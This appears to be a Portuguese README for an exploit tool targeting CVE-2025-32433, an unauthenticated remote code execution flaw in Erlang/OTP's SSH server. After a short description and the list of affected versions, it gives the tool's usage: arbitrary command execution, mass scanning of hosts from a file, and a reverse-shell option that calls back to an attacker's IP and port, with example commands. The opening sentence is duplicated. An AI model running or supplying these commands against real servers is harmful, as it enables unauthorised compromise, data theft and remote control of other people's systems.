
A vulnerabilidade permite que um atacante com acesso de rede a um servidor SSH Erlang/OTP execute código arbitrário sem autenticação prévia.
A vulnerabilidade permite que um atacante com acesso à rede a um servidor SSH Erlang/OTP execute código arbitrário sem autenticação prévia.
Uma vulnerabilidade grave foi identificada no servidor SSH Erlang/OTP que pode permitir que um atacante realize execução remota de código (RCE) não autenticada. Ao explorar uma falha no tratamento de mensagens do protocolo SSH, um agente malicioso pode obter acesso não autorizado a sistemas afetados e executar comandos arbitrários sem credenciais válidas. Isso pode levar ao comprometimento desses hosts, permitindo acesso não autorizado e manipulação de dados sensíveis por terceiros, ou ataques de negação de serviço.
OTP-27.3.2 e anteriores
OTP-26.2.5.10 e anteriores
OTP-25.3.2.19 e anteriores
python cve-2025-32433.py <host> [opções]
Opções:
-p PORT, --port PORT: Porta SSH (padrão: 22)
-t TIMEOUT, --timeout TIMEOUT: Tempo limite de conexão em segundos (padrão: 5)
-c COMMAND, --command COMMAND: Comando personalizado a ser executado
--check: Verificar se o alvo é vulnerável
-u urls.txt, --urlfile urls.txt: Arquivo contendo uma lista de hosts para escanear (um por linha)
-o output.txt, --output output.txt: Arquivo de saída para armazenar os resultados.
--shell: Iniciar um reverse shell
--lhost LHOST: IP do atacante para o reverse shell
--lport LPORT: Porta do atacante para o reverse shell (padrão: 4444)
python cve-2025-32433.py 127.0.0.1 --check
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444